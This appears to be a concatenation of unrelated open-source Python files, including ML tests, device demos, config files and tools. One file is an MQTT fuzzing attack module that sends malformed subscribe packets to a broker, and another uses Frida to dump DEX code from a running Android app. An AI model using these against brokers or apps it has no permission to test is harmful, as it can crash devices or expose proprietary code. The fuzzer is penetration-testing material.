<reponame>sagnik/baseline import pytest import numpy as np torch = pytest.importorskip('torch') from baseline.utils import Offsets from baseline.pytorch.torchy import SequenceCriterion C = 10 B = 50 S = 20 @pytest.fixture def lengths(): lengths = torch.randint(1, S, size=(B,)).long() return lengths @pytest.fixture def logits(lengths): logits = torch.rand(B, S, C) for i, l in enumerate(lengths): logits[i, l:, :] = 0 return logits @pytest.fixture def labels(lengths): lab = torch.randint(1, C, size=(B, S)).long() for i, l in enumerate(lengths): lab[i, l:] = 0 return lab def raw_loss(logits, labels, loss): B, T, H = logits.size() crit = loss(reduce=False, ignore_index=Offsets.PAD) total_size = labels.nelement() res = crit(logits.view(total_size, -1), labels.view(total_size)) return res.view(B, T) def test_batch_sequence_loss(logits, labels): loss = torch.nn.CrossEntropyLoss raw = raw_loss(logits, labels, loss) gold = torch.mean(torch.sum(raw, dim=1)) crit = SequenceCriterion(LossFn=loss, avg='batch') res = crit(logits, labels) np.testing.assert_allclose(res.numpy(), gold.numpy(), rtol=1e-6) def test_token_sequence_loss(logits, labels, lengths): loss = torch.nn.CrossEntropyLoss raw = raw_loss(logits, labels, loss) gold = torch.sum(raw) / torch.sum(lengths).to(logits.dtype) crit = SequenceCriterion(LossFn=loss, avg='token') res = crit(logits, labels) np.testing.assert_allclose(res.numpy(), gold.numpy(), rtol=1e-6)
multimedia/gui/lvgl/lvgl_img.py
708yamaguchi/MaixPy_scripts
485
62208
<reponame>708yamaguchi/MaixPy_scripts<gh_stars>100-1000 import lvgl as lv import lvgl_helper as lv_h import lcd import time from machine import Timer from machine import I2C import touchscreen as ts i2c = I2C(I2C.I2C0, freq=400000, scl=30, sda=31) lcd.init() ts.init(i2c) lv.init() disp_buf1 = lv.disp_buf_t() buf1_1 = bytearray(320*10) lv.disp_buf_init(disp_buf1,buf1_1, None, len(buf1_1)//4) disp_drv = lv.disp_drv_t() lv.disp_drv_init(disp_drv) disp_drv.buffer = disp_buf1 disp_drv.flush_cb = lv_h.flush disp_drv.hor_res = 320 disp_drv.ver_res = 240 lv.disp_drv_register(disp_drv) indev_drv = lv.indev_drv_t() lv.indev_drv_init(indev_drv) indev_drv.type = lv.INDEV_TYPE.POINTER indev_drv.read_cb = lv_h.read lv.indev_drv_register(indev_drv) # lv.log_register_print_cb(lv_h.log) lv.log_register_print_cb(lambda level,path,line,msg: print('%s(%d): %s' % (path, line, msg))) # Image data with open('/flash/blue_flower_32.bin','rb') as f: img_data = f.read() # Pixel format: Fix 0xFF: 8 bit, Red: 8 bit, Green: 8 bit, Blue: 8 bit # Create a screen with a draggable image scr = lv.obj() img = lv.img(scr) img.align(scr, lv.ALIGN.CENTER, 0, 0) img_dsc = lv.img_dsc_t({ 'header':{ 'always_zero': 0, 'w':100, 'h':75, 'cf':lv.img.CF.TRUE_COLOR }, 'data_size': len(img_data), 'data': img_data }) img.set_src(img_dsc) img.set_drag(False) # Load the screen and display image lv.scr_load(scr) def on_timer(timer): lv.tick_inc(5) timer = Timer(Timer.TIMER0, Timer.CHANNEL0, mode=Timer.MODE_PERIODIC, period=5, unit=Timer.UNIT_MS, callback=on_timer, arg=None) while True: tim = time.ticks_ms() lv.task_handler() while time.ticks_ms()-tim < 5: pass
script/dumpdex.py
4ch12dy/xadb
326
62220
<filename>script/dumpdex.py import json import os import sys import frida import time import re if len(sys.argv) <= 1: print("[Dumpdex]: you should pass pid/packageName") exit() device = frida.get_usb_device() pkg_name = device.get_frontmost_application().identifier # check is package or pid pattern = re.compile(r'^\d+$', re.I) m = pattern.match(sys.argv[1]) if m: app_pid = sys.argv[1] print("[Dumpdex]: you specail the pid:" + app_pid) # if customize the pid, use this pid. Such as app has mutiple pid if ('app_pid' in locals() or 'app_pid' in globals()) and app_pid: session = device.attach(int(app_pid)) else: session = device.attach(pkg_name) else: pkg_name = sys.argv[1] print("[Dumpdex]: you specail the package name:" + pkg_name + ", so spawn it and sleep 50s for launch completely") pid = device.spawn(pkg_name) time.sleep(50); session = device.attach(pid) script = session.create_script(open(open(os.path.expanduser("~/.xadb/rootdir")).read().strip() + "/script/agent.js").read()) script.load() matches = script.exports.scandex() for dex in matches: bs = script.exports.memorydump(dex['addr'], dex['size']) if not os.path.exists("./" + pkg_name + "/"): os.mkdir("./" + pkg_name + "/") open(pkg_name + "/" + dex['addr'] + ".dex", 'wb').write(bs) print("[Dumpdex]: DexSize=" + hex(dex['size']) + ", SavePath=./" + pkg_name + "/" + dex['addr'] + ".dex")
recipes/Python/576735_How_to_use_twisted_pb_FilePager/recipe-576735.py
tdiprima/code
2,023
62224
<reponame>tdiprima/code from twisted.spread.util import FilePager from twisted.spread.flavors import Referenceable from twisted.internet.defer import Deferred import os PATH = r"C:\temp\very_large_file.exe" ### Server Side class ResultsPager(FilePager): def __init__(self, collector, path): self._deferred = Deferred() print "%s, %d bytes" % (path, os.path.getsize(path)) fd = file(path, 'rb') FilePager.__init__(self, collector, fd, callback=self.done) def done(self): print "The entire file has been transferred." self._deferred.callback(self.collector) def wait(self): return self._deferred class FilePagerizer(Referenceable): def remote_getFile(self, collector, path): pager = ResultsPager(collector, path) return pager.wait() ### Client Side class SimplePageCollector(Referenceable): def __init__(self): self.pages = [] def remote_gotPage(self, page): self.pages.append(page) print "gotPage (%d bytes)" % len(page) def remote_endedPaging(self): print 'endedPaging' class FilerGetter: def __init__(self, p): self._file_pagerizer = p def getRemoteFile(self, path): root, ext = os.path.splitext(os.path.basename(path)) local_path = root + '-new' + ext return self._file_pagerizer.callRemote( "getFile", SimplePageCollector(), path).addCallback(self._finished, local_path) def _finished(self, collector, path): data = ''.join(collector.pages) with file(path, 'wb') as f: f.write(data) print "write to %s, %d bytes" % (path, len(data)) if __name__ == '__main__': import sys from twisted.internet import reactor from twisted.python import log log.startLogging(sys.stdout) PORTNO = 8123 if sys.argv[1] == 'server': from twisted.spread.flavors import Root from twisted.spread.pb import PBServerFactory class SimpleRoot(Root): def rootObject(self, broker): return FilePagerizer() reactor.listenTCP(PORTNO, PBServerFactory(SimpleRoot())) elif sys.argv[1] == 'client': from twisted.spread import pb def getFile1(x, path): r = FilerGetter(x) return r.getRemoteFile(path) from twisted.spread import util def getFile2(x, path): def finished(pages): data = ''.join(pages) root, ext = os.path.splitext(os.path.basename(path)) local_path = root + '-new' + ext f = file(local_path, 'wb') f.write(data) print "%d bytes written to %s" % (len(data), local_path) util.getAllPages(x, "getFile", path).addCallback(finished) cf = pb.PBClientFactory() reactor.connectTCP("localhost", PORTNO, cf) cf.getRootObject().addCallback(getFile2, PATH) else: raise sys.exit("usage: %s (server|client)" % sys.argv[0]) reactor.run()
RecoPixelVertexing/PixelLowPtUtilities/python/StripSubClusterShapeSeedFilter_cfi.py
ckamtsikis/cmssw
852
62267
<gh_stars>100-1000 import FWCore.ParameterSet.Config as cms from RecoPixelVertexing.PixelLowPtUtilities.StripSubClusterShapeFilter_cfi import StripSubClusterShapeFilterParams StripSubClusterShapeSeedFilter = cms.PSet( StripSubClusterShapeFilterParams, ComponentName = cms.string('StripSubClusterShapeSeedFilter'), FilterAtHelixStage = cms.bool(False), label = cms.untracked.string("Seeds"), )
src/protocols/MQTT/attacks/mqtt_generation_based_fuzzing.py
QWERTSKIHACK/peniot
143
62346
<filename>src/protocols/MQTT/attacks/mqtt_generation_based_fuzzing.py import multiprocessing import unittest import paho.mqtt.client as paho import logging import random import signal import struct import time from Entity.attack import Attack from Entity.input_format import InputFormat from Utils.RandomUtil import random_generated_names class MQTTGenerationBasedFuzzingAttack(Attack): """ MQTT Protocol - Payload Size Fuzzer Attack module It is created to test any MQTT device as black box test with malformed or semi-malformed inputs """ client = None # Input Fields address = None # Misc Members sent_message_count = 0 # Transmitted fuzzing packets logger = None stopped_flag = False subscribe = paho.SUBSCRIBE unsubscribe = paho.UNSUBSCRIBE def __init__(self): default_parameters = ["127.0.0.1"] inputs = [ InputFormat("Broker Address", "address", "", str, mandatory=True) ] Attack.__init__(self, "MQTT Generation Based Fuzzing Attack", inputs, default_parameters, " Inject the packets which are created from the scratch\n" " and changed by come of their bits to corrupt the content") logging.basicConfig(level=logging.DEBUG, format="%(asctime)s:%(levelname)s:%(name)s:%(message)s") # Signal handler to exit from function signal.signal(signal.SIGINT, self.signal_handler) def signal_handler(self, sig, frame): self.stop_attack() def stop_attack(self): self.logger.info("Transmitted fuzzing packet count: {0}, exitting...".format(self.sent_message_count)) self.stopped_flag = True if (self.client is not None): self.client.disconnect() # Close the connection before exitting time.sleep(2) # Sleep two seconds so the user can see the message # sys.exit(0) def pre_attack_init(self): self.client = paho.Client(random_generated_names.get_random_client_name()) try: self.client.connect(self.address) except Exception as e: self.logger.error("Failed to connect to broker") def send_subscribe_or_unsubscribe(self, fuzz_client, message_type, topics, dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x2): """ Generic subscribe and unsubscribe packet injection functionality :param fuzz_client: Client ot be fuzzed :param message_type: Currently either SUBSCRIBE or UNSUBSCRIBE :param topics: Topics in form [("my/topic", 0), ("another/topic", 2)] for SUBSCRIBE or ["my/topic",another/topic"] for UNSUBSCRIBE :param dup: Duplicate flag, I set it FALSE, but you can test with TRUE :param optional_remaining_length: To exploit message content, normally MQTT header length for SUBSCRIBE and UNSUBSCRIBE is 2 bytes :param command_dup_shift_times: Aligning command in header, change this to create malformed messages :param command_base_xor_part: Normally, we need to perform XOR with 0x2 to command part of MQTT Control Packet field of the header :type fuzz_client: mqtt.Client :return: Tuple of queued message and local mid """ remaining_length = optional_remaining_length for t in topics: remaining_length += optional_remaining_length + len(t) command = message_type | (dup << command_dup_shift_times) | command_base_xor_part packet = bytearray() packet.append(command) fuzz_client._pack_remaining_length(packet, remaining_length) local_mid = fuzz_client._mid_generate() packet.extend(struct.pack("!H", local_mid)) if message_type == self.subscribe: for t, q in topics: fuzz_client._pack_str16(packet, t) packet.append(q) elif message_type == self.unsubscribe: for t in topics: fuzz_client._pack_str16(packet, t) else: self.logger.info("Unknown message type in Generation Based Fuzzing") return (fuzz_client._packet_queue(command, packet, local_mid, 1), local_mid) def random_topic_generator(self, message_type, possible_characters, possible_qos_values, length=10): try: assert length > 2 where_to_put_slash = random.randint(1, length - 1) topic = "{0}/{1}".format( "".join([random.choice(possible_characters) for _ in range(1, where_to_put_slash)]), "".join([random.choice(possible_characters) for _ in range(where_to_put_slash, length)])) if message_type == self.subscribe: return topic, random.choice(possible_qos_values) elif message_type == self.unsubscribe: return topic else: self.logger.info("Unknown message type in Generation Based Fuzzing") except AssertionError: self.logger.error("Length must be greater than 2") return "random/topic" def run(self): Attack.run(self) self.pre_attack_init() subscribe = paho.SUBSCRIBE unsubscribe = paho.UNSUBSCRIBE # Quality of service creator random_qosses = [0, 1, 2] # Currently include "A...Za...z" random_strings = "".join([chr(_) for _ in range(65, 91)]) + "".join([chr(_) for _ in range(97, 123)]) ''' (fuzz_client, message_type, topics, dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x2): ''' test_cases = [ dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses)] , dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x2), dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses), self.random_topic_generator(subscribe, random_strings, random_qosses)] , dup=False, optional_remaining_length=3, command_dup_shift_times=3, command_base_xor_part=0x2), dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses)] , dup=False, optional_remaining_length=2, command_dup_shift_times=5, command_base_xor_part=0x2), dict(message_type=subscribe, topics=[self.random_topic_generator(subscribe, random_strings, random_qosses)] , dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x5), dict(message_type=unsubscribe, topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses)] , dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x2), dict(message_type=unsubscribe, topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses), self.random_topic_generator(unsubscribe, random_strings, random_qosses)] , dup=False, optional_remaining_length=3, command_dup_shift_times=3, command_base_xor_part=0x2), dict(message_type=unsubscribe, topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses)] , dup=False, optional_remaining_length=2, command_dup_shift_times=5, command_base_xor_part=0x2), dict(message_type=unsubscribe, topics=[self.random_topic_generator(unsubscribe, random_strings, random_qosses)] , dup=False, optional_remaining_length=2, command_dup_shift_times=3, command_base_xor_part=0x5) ] for test_case in test_cases: if self.stopped_flag is True: break self.send_subscribe_or_unsubscribe( self.client, test_case["message_type"], test_case["topics"], test_case["dup"], test_case["optional_remaining_length"], test_case["command_dup_shift_times"], test_case["command_base_xor_part"] ) # Increment sent message count self.sent_message_count += 1 self.logger.info("Test case {0} has been run in generation based fuzzing".format(str(test_case))) time.sleep(1) class TestMQTTGenerationBasedFuzzingAttack(unittest.TestCase): def setUp(self): self.mqtt_generation_based_fuzzer = MQTTGenerationBasedFuzzingAttack() def tearDown(self): pass def test_name(self): self.assertEqual("MQTT Generation Based Fuzzing Attack", self.mqtt_generation_based_fuzzer.get_attack_name()) def test_inputs(self): inputs = self.mqtt_generation_based_fuzzer.get_inputs() self.assertIsNotNone(inputs) self.assertGreater(len(inputs), 0, "Non inserted inputs") self.assertEquals(len(inputs), 1) def test_non_initialized_inputs(self): inputs = self.mqtt_generation_based_fuzzer.get_inputs() for _input in inputs: value = getattr(self.mqtt_generation_based_fuzzer, _input.get_name()) self.assertTrue(value is None or type(value) == _input.get_type()) def test_after_getting_inputs(self): example_inputs = ["a.b.c.d"] for index, _input in enumerate(example_inputs): self.mqtt_generation_based_fuzzer.inputs[index].set_value(_input) # Previously it should not be set self.assertIsNone(self.mqtt_generation_based_fuzzer.client) super(MQTTGenerationBasedFuzzingAttack, self.mqtt_generation_based_fuzzer).run() inputs = self.mqtt_generation_based_fuzzer.get_inputs() for index, _input in enumerate(inputs): value = getattr(self.mqtt_generation_based_fuzzer, _input.get_name()) self.assertEqual(example_inputs[index], value) def testGenerationBasedFuzzingAttack(self): def run_attack(): example_inputs = ["127.0.0.1"] for index, _input in enumerate(example_inputs): self.mqtt_generation_based_fuzzer.inputs[index].set_value(_input) try: self.mqtt_generation_based_fuzzer.run() except Exception as e: self.assertTrue(False) print "* If server is not initialized this test will not execute properly." p = multiprocessing.Process(target=run_attack, name="Generation Based Fuzzing Attack") p.start() time.sleep(10) if p.is_alive(): p.terminate() p.join() if __name__ == '__main__': unittest.main()
tests/chainer_tests/functions_tests/normalization_tests/test_layer_normalization.py
zaltoprofen/chainer
3,705
62351
import numpy from chainer import functions from chainer import testing @testing.parameterize(*(testing.product({ 'batchsize': [1, 5], 'size': [10, 20], 'dtype': [numpy.float32], 'eps': [1e-5, 1e-1], }))) @testing.inject_backend_tests( None, # CPU tests [ {}, ] # GPU tests + testing.product({ 'use_cuda': [True], 'use_cudnn': ['never', 'always'], 'cuda_device': [0, 1], }) # ChainerX tests + [ {'use_chainerx': True, 'chainerx_device': 'native:0'}, {'use_chainerx': True, 'chainerx_device': 'cuda:0'}, {'use_chainerx': True, 'chainerx_device': 'cuda:1'}, ] ) class TestLayerNormalization(testing.FunctionTestCase): def setUp(self): self.check_forward_options = {'atol': 1e-4, 'rtol': 1e-3} self.check_backward_options = {'atol': 1e-3, 'rtol': 1e-2} self.check_double_backward_options = {'atol': 1e-3, 'rtol': 1e-2} if self.dtype == numpy.float16: self.check_forward_options = {'atol': 1e-3, 'rtol': 1e-2} self.check_backward_options = {'atol': 1e-3, 'rtol': 1e-2} self.check_double_backward_options = {'atol': 1e-3, 'rtol': 1e-2} def generate_inputs(self): shape = self.batchsize, self.size size = numpy.prod(shape) // shape[0] x = numpy.random.uniform(-1, 1, shape).astype(self.dtype) gamma = numpy.random.uniform(-1, 1, size).astype(self.dtype) beta = numpy.random.uniform(-1, 1, size).astype(self.dtype) return x, gamma, beta def forward_expected(self, inputs): x, gamma, beta = inputs mean = numpy.mean(x, axis=1, keepdims=True) var = numpy.mean(numpy.square(x - mean), axis=1, keepdims=True) std = numpy.sqrt(var + self.eps) y_expected = ( numpy.expand_dims(gamma, axis=0) * (x - mean) / std + numpy.expand_dims(beta, axis=0)) return y_expected, def forward(self, inputs, device): x, gamma, beta = inputs y = functions.layer_normalization(x, gamma, beta, eps=self.eps) return y, testing.run_module(__name__, __file__)
tests/integration/test_indices.py
fduguet-nv/cunumeric
304
62373
# Copyright 2022 NVIDIA Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import random import numpy as np import pytest import cunumeric as cn from legate.core import LEGATE_MAX_DIM @pytest.mark.parametrize("ndim", range(0, LEGATE_MAX_DIM)) def test_indices(ndim): dimensions = tuple(random.randint(2, 5) for i in range(ndim)) np_res = np.indices(dimensions) cn_res = cn.indices(dimensions) assert np.array_equal(np_res, cn_res) np_res = np.indices(dimensions, dtype=float) cn_res = cn.indices(dimensions, dtype=float) assert np.array_equal(np_res, cn_res) np_res = np.indices(dimensions, sparse=True) cn_res = cn.indices(dimensions, sparse=True) for i in range(len(np_res)): assert np.array_equal(np_res[i], cn_res[i]) if __name__ == "__main__": import sys sys.exit(pytest.main(sys.argv))
tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/pcDevice/windows/windowsDeviceAPI.py
Passer-D/GameAISDK
1,210
62389
<filename>tools/SDKTool/src/WrappedDeviceAPI/deviceAPI/pcDevice/windows/windowsDeviceAPI.py<gh_stars>1000+ # -*- coding: utf-8 -*- """ Tencent is pleased to support the open source community by making GameAISDK available. This source code file is licensed under the GNU General Public License Version 3. For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package. Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved. """ import time import traceback import logging import win32gui from ..iPcDeviceAPI import IPcDeviceAPI from .APIDefine import LOG_DEFAULT from .win32driver.capture import get_image, roi from .win32driver.keyboard import Keyboard from .win32driver.mouse import Mouse, MouseClickType, MouseFlag from .win32driver.probe import Win32Probe, set_foreground_window from .win32driver.by import QPath class WindowsDeviceAPI(IPcDeviceAPI): def __init__(self, platform): IPcDeviceAPI.__init__(self, platform) self.__logger = logging.getLogger(LOG_DEFAULT) self._is_desktop_window = False self._hwnd = None self._qpath = None self._windows_size = None self._kwargs = {} def Initialize(self, **kwargs): hwnd = kwargs.get('hwnd', None) query_path = kwargs.get('query_path', None) window_size = kwargs.get('window_size', None) if not hwnd and query_path is None: hwnd = win32gui.GetDesktopWindow() self._is_desktop_window = True if not hwnd and query_path: # hwnd = 0xE019DC hwnds = Win32Probe().search_element(QPath(query_path)) cnt = len(hwnds) if cnt > 1: raise Exception('found multi windows by qpath(%s)' % query_path) elif cnt == 0: raise Exception('failed to find window by qpath(%s)' % query_path) hwnd = hwnds[0] if isinstance(hwnd, str) and hwnd.isdigit(): hwnd = int(hwnd) if not win32gui.IsWindow(hwnd): raise ValueError('hwnd(%s) is not valid' % hwnd) if window_size: l, t, r, b = win32gui.GetWindowRect(hwnd) w = r - l h = b - t if abs(w - window_size[0]) > 50 or abs(h - window_size[1]) > 50: raise Exception('window size is not equal, real(%s) != %s' % (str([w, h]), str(window_size))) top_hwnd = Win32Probe().get_property(hwnd, 'TOPLEVELWINDOW') if top_hwnd: set_foreground_window(top_hwnd) self._hwnd = hwnd self._qpath = query_path self._kwargs = kwargs self._windows_size = window_size return True @property def window_handle(self): return self._hwnd def DeInitialize(self): return True def ScreenCap(self, subrect=None): """ :param subrect: :return: """ try: img_data = get_image(self._hwnd) if img_data is not None and subrect: img_data = roi(img_data, subrect) return img_data except Exception as e: self.__logger.error('screencap error: %s', e) raise e def _to_screen_pos(self, client_pos): """ 将相对于窗口的坐标转成屏幕坐标 :param client_pos: :return: """ if self._is_desktop_window: return client_pos x, y = client_pos rc = win32gui.GetWindowRect(self._hwnd) pt = (x + rc[0], y + rc[1]) return pt def PressKey(self, key): Keyboard.press_key(key) def ReleaseKey(self, key): Keyboard.release_key(key) def InputKeys(self, keys, long_click_time): # self.keyboard.inputKeys(keys) Keyboard.input_keys(keys) if long_click_time > 0: time.sleep(long_click_time/1000) def InputStrings(self, key_string): Keyboard.input_keys(key_string) # self.keyboard.inputString(key_string) def MouseMove(self, px, py): sx, sy = self._to_screen_pos((px, py)) Mouse.move(sx, sy) # percent_x, percent_y = self.pixel_to_percent(px, py) # self.mouse.move((percent_x, percent_y)) def MouseClick(self, px, py, by_post=False): if by_post: Mouse.post_click(self._hwnd, px, py) else: sx, sy = self._to_screen_pos((px, py)) Mouse.click(sx, sy) # percent_x, percent_y = self.pixel_to_percent(px, py) # self.mouse.click((percent_x, percent_y)) def MouseDoubleClick(self, px, py): sx, sy = self._to_screen_pos((px, py)) Mouse.click(sx, sy, click_type=MouseClickType.DoubleClick) # percent_x, percent_y = self.pixel_to_percent(px, py) # self.mouse.doubleclick((percent_x, percent_y)) def MouseRightClick(self, px, py): sx, sy = self._to_screen_pos((px, py)) Mouse.click(sx, sy, MouseFlag.RightButton) # percent_x, percent_y = self.pixel_to_percent(px, py) # self.mouse.rightclick((percent_x, percent_y)) def MouseLongClick(self, px, py, long_click_time): """ :param px: :param py: :param long_click_time: 长按时间,以毫秒为单位 :return: """ sx, sy = self._to_screen_pos((px, py)) Mouse.click(sx, sy) time.sleep(long_click_time/1000) # percent_x, percent_y = self.pixel_to_percent(px, py) # self.mouse.longclick(long_click_time / 1000, (percent_x, percent_y)) def MouseDrag(self, from_x, from_y, to_x, to_y): """ 从起点(from_x, from_y)拖动到(to_x, to_y) :param from_x: :param from_y: :param to_x: :param to_y: :return: """ sfx, sfy = self._to_screen_pos((from_x, from_y)) stx, sty = self._to_screen_pos((to_x, to_y)) Mouse.drag(sfx, sfy, stx, sty)
examples/calibration_registration/register.py
seanyen/Azure-Kinect-Sensor-SDK
1,120
62400
""" An app script to run registration between two cameras from the command line. Copyright (C) Microsoft Corporation. All rights reserved. """ # Standard Libraries. import argparse # Calibration tools. from camera_tools import register # ------------------------------------------------------------------------------ def parse_args(): """ Get arguments for running the registration. Returns: args -- Return a list of command line arguments for running registration. """ parser = argparse.ArgumentParser(description="Get extrinsics for cameras.") parser.add_argument("-ia", "--img-a", required=True, help="Full path to image from camera A.") parser.add_argument("-ib", "--img-b", required=True, help="Full path to image from camera B.") parser.add_argument("-t", "--template", required=True, help="Full path to Charuco board template file.") parser.add_argument("-ca", "--calib-a", required=True, help="Full path to calibration file from camera A.") parser.add_argument("-cb", "--calib-b", required=True, help="Full path to calibration file from camera B.") parser.add_argument("-o", "--out-dir", required=True, help="Output directory for full calibration blob.") cmd_args = parser.parse_args() return cmd_args if __name__ == "__main__": args = parse_args() rotation, translation, rms1_pixels, rms1_rad, rms2_pixels, rms2_rad = \ register(args.img_a, args.img_b, args.template, args.calib_a, args.calib_b, args.out_dir)
VulnerableScan/migrations/0004_remove_exploitregister_file_object_and_more.py
b0bac/ApolloScanner
289
62433
# Generated by Django 4.0.1 on 2022-03-10 17:36 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('Assets', '0003_alter_assetlist_timestamp_alter_assettask_timestamp'), ('VulnerableScan', '0003_alter_exploitregister_timestamp_and_more'), ] operations = [ migrations.RemoveField( model_name='exploitregister', name='file_object', ), migrations.AddField( model_name='exploitregister', name='code', field=models.TextField(db_column='code', null=True, verbose_name='负载代码'), ), migrations.AddField( model_name='exploitregister', name='debug_info', field=models.TextField(blank=True, db_column='debug_info', default='', null=True, verbose_name='调试信息'), ), migrations.AddField( model_name='exploitregister', name='function_name', field=models.CharField(db_column='function_name', default='', max_length=100, verbose_name='函数名称'), ), migrations.AddField( model_name='exploitregister', name='target', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='Assets.assetlist', verbose_name='调试目标'), ), migrations.AlterField( model_name='exploitregister', name='description', field=models.TextField(db_column='description', verbose_name='负载描述'), ), ]
tests/framework/CodeInterfaceTests/RAVEN/ReturnDatabase/innerRunDir/nd_data.py
rinelson456/raven
159
62469
# Copyright 2017 Battelle Energy Alliance, LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import numpy as np def run(raven, inputs): """ Run method. @ In, raven, object, RAVEN object @ In, inputs, dict, input dictionary @ Out, None """ # inputs: a, b, c # outputs: d, e, f # indices: d(), e(x), f(x, y) a = raven.a b = raven.b c = raven.c nx = 5 ny = 3 x = np.arange(nx) * 0.1 y = np.arange(ny) * 10 d = a*a e = x * b f = np.arange(nx*ny).reshape(nx, ny) * c # save raven.x = x raven.y = y raven.d = d raven.e = e raven.f = f raven._indexMap = {'e': ['x'], 'f': ['x', 'y'] }
db_bascline.py
wstart/DB_BaseLine
152
62546
<reponame>wstart/DB_BaseLine # -*- coding: utf-8 -*- import sys reload(sys) sys.setdefaultencoding('utf-8') from script.mysql_baseline import * from loghandle import * import getopt if __name__ == "__main__": bannber = ''' ____ ____ ____ _ _ {''' + db_baseline_basic.getVersion() + '''} | _ \| __ )| __ ) __ _ ___ ___| (_)_ __ ___ | | | | _ \| _ \ / _` / __|/ _ \ | | '_ \ / _ \\ | |_| | |_) | |_) | (_| \__ \ __/ | | | | | __/ |____/|____/|____/ \__,_|___/\___|_|_|_| |_|\___| (https://github.com/wstart/DB_BaseLine) --------------------------------------------------''' supperdb = ["mysql"] DBnames = ",".join(supperdb) small_helper=''' Usage: python db_baseline.py [options] python db_baseline.py -h for more infomation ''' helper = ''' Usage: python db_baseline.py [options] [Options]: -v ,--version show version -h,--help show help -D,--database check DataBase type,default is mysql support Database list: ''' + DBnames + ''' -H,--host host,Default:127.0.0.1 if host is not 127.0.0.1 or localhost only check command -P,--database-port database port,Default:Database Default port it will set by check script -u,--database-user database rootuser,default:root -p,--database-password database password,default:root ''' plog = loghandle.getLogEntity() plog.output(bannber, "INFO", showtime=False, showlevel=False) runconfig = { "database": "", "host": "", "database_port": "", "database_user": "", "database_password": "" } try: opts, args = getopt.getopt(sys.argv[1:], "vhD:H:P:u:p:", ["version", "help", "database=", "host=", "database-port=", "database-user=", "database-password="]) checkscript = "" if len(opts) == 0: print small_helper exit() for o, a in opts: if o in ("-v", "--version"): print("DB_BASELINE : " + db_baseline_basic.getVersion()) sys.exit() elif o in ("-h", "--help"): print helper sys.exit() elif o in ("-D", "--database"): runconfig["database"] = a elif o in ("-H", "--host"): runconfig["host"] = a elif o in ("-P", "--database-port"): runconfig["database_port"] = a elif o in ("-U", "--database-user"): runconfig["database_user"] = a elif o in ("-p", "--database-password"): runconfig["database_password"] = a if runconfig["database"] == "mysql": checkscript = mysql_baseline(runconfig) if checkscript != "": result = checkscript.runtest() else: plog.output("No match DataBase Type","ERROR") print small_helper plog.output("DBBaseline exit()") except getopt.GetoptError: print helper
data-processing/scripts/fetch_arxiv_sources.py
hhchi13/scholarphi
285
62553
<filename>data-processing/scripts/fetch_arxiv_sources.py import argparse import os from common import directories from common.fetch_arxiv import fetch_from_arxiv from common.unpack import unpack, unpack_archive if __name__ == "__main__": parser = argparse.ArgumentParser( "Fetch and unpack sources for a single arXiv paper." ) parser.add_argument( "arxiv_id", help="The arXiv ID for a paper. May include version number (i.e., 'v1', 'v2', etc.)", ) parser.add_argument( "--output-dir", help=( "Directory into which the arXiv sources will be fetched. The fetched sources will " + "be saved in a subfolder of the output folder with its name as the arXiv ID " + "(i.e., 'output_dir/<arxiv_id>/')." ), default="tmp", ) args = parser.parse_args() arxiv_id = args.arxiv_id output_dir = args.output_dir archives_dir = os.path.join(output_dir, "archives") archive_path = os.path.join(archives_dir, directories.escape_slashes(arxiv_id)) sources_dir = os.path.join(output_dir, directories.escape_slashes(arxiv_id)) if not os.path.exists(archives_dir): print(f"Creating directory to hold source archives at {archives_dir}.") os.makedirs(archives_dir) print( f"Downloading archive of source files from arXiv for paper {arxiv_id}...", end="", ) fetch_from_arxiv(arxiv_id, dest=archive_path) print("done.") if not os.path.exists(sources_dir): print(f"Creating directory to hold unpacked sources at {sources_dir}.") os.makedirs(sources_dir) print(f"Unpacking sources for paper {arxiv_id} into {sources_dir}.") unpack_archive(archive_path, sources_dir)
src/gfl/shell/shell.py
mingt2019/GFL
123
62578
<gh_stars>100-1000 import os import sys import requests from gfl.conf import GflConf class Shell(object): __host = "127.0.0.1" __port = 9434 @classmethod def welcome(cls, **kwargs): print("------- GFL -------") print("%-20s:%s" % ("pid", str(os.getpid()))) @classmethod def attach(cls, host, port): cls.welcome() cls.startup(host=host, port=port) pass @classmethod def startup(cls, **kwargs): cls.__host = kwargs.pop("host", "127.0.0.1") cls.__port = kwargs.pop("port", GflConf.get_property("api.http.port")) while True: cmd = input("> ") if "EXIT".lower() == cmd.lower(): cls.exit() break if cmd.startswith("SHOWCONF"): key = cmd[9:].strip() print(GflConf.get_property(key)) @classmethod def exit(cls, **kwargs): req_url = "http://%s:%s/shutdown" % (cls.__host, cls.__port) resp = requests.post(req_url) try: data = resp.json() if data["code"] == 0: return True else: return False except: return False
tests/ignite/distributed/utils/test_serial.py
Juddd/ignite
4,119
62607
